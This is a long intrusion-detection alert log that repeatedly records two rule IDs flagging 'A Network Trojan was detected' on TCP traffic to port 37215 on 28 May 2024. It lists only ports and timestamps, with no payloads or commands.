          SID:2835222
          Source Port:49938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327956
          SID:2835222
          Source Port:40588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475735
          SID:2835222
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914212
          SID:2829579
          Source Port:42096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339520
          SID:2835222
          Source Port:38770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176429
          SID:2835222
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744441
          SID:2829579
          Source Port:38782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873584
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268637
          SID:2829579
          Source Port:41196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151200
          SID:2835222
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328905
          SID:2835222
          Source Port:49140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497768
          SID:2829579
          Source Port:42472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239459
          SID:2829579
          Source Port:59892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295242
          SID:2835222
          Source Port:47574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466420
          SID:2829579
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838507
          SID:2835222
          Source Port:54712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510326
          SID:2829579
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298545
          SID:2835222
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543452
          SID:2835222
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160912
          SID:2829579
          Source Port:51568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125715
          SID:2829579
          Source Port:58072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204590
          SID:2835222
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234645
          SID:2835222
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239163
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.333340
          SID:2829579
          Source Port:33036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187324
          SID:2829579
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622211
          SID:2835222
          Source Port:39008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793558
          SID:2835222
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295056
          SID:2835222
          Source Port:34666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691538
          SID:2829579
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267813
          SID:2835222
          Source Port:33980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141773
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550166
          SID:2829579
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215986
          SID:2835222
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324205
          SID:2829579
          Source Port:52198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891633
          SID:2835222
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299309
          SID:2829579
          Source Port:47438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062182
          SID:2835222
          Source Port:50368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528306
          SID:2835222
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555269
          SID:2835222
          Source Port:54612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204558
          SID:2835222
          Source Port:51012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175804
          SID:2829579
          Source Port:58958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328837
          SID:2835222
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890317
          SID:2829579
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985182
          SID:2835222
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677676
          SID:2835222
          Source Port:48326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124477
          SID:2835222
          Source Port:56044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2829579
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438732
          SID:2829579
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760187
          SID:2835222
          Source Port:51926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590733
          SID:2829579
          Source Port:34642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543591
          SID:2829579
          Source Port:46524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170686
          SID:2829579
          Source Port:37436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064806
          SID:2829579
          Source Port:39988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663991
          SID:2835222
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271180
          SID:2829579
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472299
          SID:2829579
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742435
          SID:2835222
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669468
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269771
          SID:2835222
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964206
          SID:2829579
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564102
          SID:2835222
          Source Port:33832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431436
          SID:2829579
          Source Port:34956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127467
          SID:2835222
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213625
          SID:2835222
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357186
          SID:2829579
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065351
          SID:2829579
          Source Port:36056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369167
          SID:2829579
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711531
          SID:2835222
          Source Port:36438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879283
          SID:2835222
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962891
          SID:2835222
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207026
          SID:2835222
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481107
          SID:2829579
          Source Port:56310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890723
          SID:2835222
          Source Port:33412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156762
          SID:2829579
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721925
          SID:2829579
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663084
          SID:2829579
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590928
          SID:2835222
          Source Port:33168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535600
          SID:2835222
          Source Port:59040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804125
          SID:2835222
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593335
          SID:2835222
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817961
          SID:2829579
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081218
          SID:2829579
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773980
          SID:2829579
          Source Port:47394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.149980
          SID:2829579
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146396
          SID:2829579
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202299
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728769
          SID:2829579
          Source Port:41178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146282
          SID:2835222
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170568
          SID:2829579
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973034
          SID:2829579
          Source Port:54596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.992947
          SID:2835222
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334341
          SID:2835222
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533125
          SID:2829579
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547567
          SID:2835222
          Source Port:55424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708331
          SID:2835222
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090752
          SID:2835222
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084262
          SID:2829579
          Source Port:49944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949305
          SID:2829579
          Source Port:35114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.238148
          SID:2835222
          Source Port:33162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083868
          SID:2835222
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061507
          SID:2829579
          Source Port:38282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.428399
          SID:2835222
          Source Port:34012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662906
          SID:2829579
          Source Port:42910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112767
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598877
          SID:2829579
          Source Port:36252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401035
          SID:2829579
          Source Port:50918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147390
          SID:2835222
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210610
          SID:2829579
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116979
          SID:2829579
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975882
          SID:2829579
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655887
          SID:2829579
          Source Port:36102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512328
          SID:2829579
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2835222
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064562
          SID:2835222
          Source Port:36162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464173
          SID:2835222
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537546
          SID:2835222
          Source Port:33646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298309
          SID:2829579
          Source Port:59444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893764
          SID:2835222
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230127
          SID:2835222
          Source Port:60822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287687
          SID:2829579
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764633
          SID:2829579
          Source Port:34496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685416
          SID:2829579
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943370
          SID:2835222
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813067
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415987
          SID:2835222
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631828
          SID:2829579
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422512
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805568
          SID:2835222
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422460
          SID:2829579
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.089809
          SID:2835222
          Source Port:56272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923339
          SID:2835222
          Source Port:60310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804651
          SID:2835222
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692796
          SID:2835222
          Source Port:41170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594188
          SID:2835222
          Source Port:38040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187381
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923822
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631630
          SID:2829579
          Source Port:57486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861557
          SID:2829579
          Source Port:38392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537982
          SID:2829579
          Source Port:52364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426001
          SID:2829579
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794867
          SID:2829579
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594595
          SID:2829579
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708852
          SID:2835222
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559252
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232866
          SID:2829579
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652976
          SID:2835222
          Source Port:56718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466461
          SID:2829579
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206399
          SID:2835222
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195690
          SID:2835222
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294768
          SID:2829579
          Source Port:47642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561806
          SID:2835222
          Source Port:55896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269609
          SID:2829579
          Source Port:45760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.440055
          SID:2835222
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528942
          SID:2829579
          Source Port:58930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225989
          SID:2835222
          Source Port:54972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298825
          SID:2829579
          Source Port:40784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975315
          SID:2835222
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.065034
          SID:2829579
          Source Port:60406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300005
          SID:2835222
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116807
          SID:2829579
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195807
          SID:2829579
          Source Port:42832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996560
          SID:2835222
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594166
          SID:2829579
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513091
          SID:2835222
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591950
          SID:2829579
          Source Port:35934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722055
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714466
          SID:2829579
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338039
          SID:2829579
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552658
          SID:2829579
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112945
          SID:2829579
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743517
          SID:2835222
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231780
          SID:2829579
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102730
          SID:2829579
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.340239
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214130
          SID:2835222
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698548
          SID:2835222
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000605
          SID:2829579
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996163
          SID:2829579
          Source Port:37572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668259
          SID:2835222
          Source Port:41070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176671
          SID:2829579
          Source Port:47728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327949
          SID:2835222
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989018
          SID:2835222
          Source Port:36888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288009
          SID:2829579
          Source Port:46824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.047823
          SID:2829579
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557884
          SID:2835222
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204799
          SID:2835222
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559760
          SID:2829579
          Source Port:47870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216989
          SID:2829579
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281657
          SID:2835222
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300089
          SID:2829579
          Source Port:41160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411802
          SID:2829579
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808042
          SID:2835222
          Source Port:56982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207057
          SID:2829579
          Source Port:56720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342292
          SID:2835222
          Source Port:37336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979367
          SID:2829579
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201410
          SID:2829579
          Source Port:54668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153553
          SID:2829579
          Source Port:60532
          Destination Port:37215
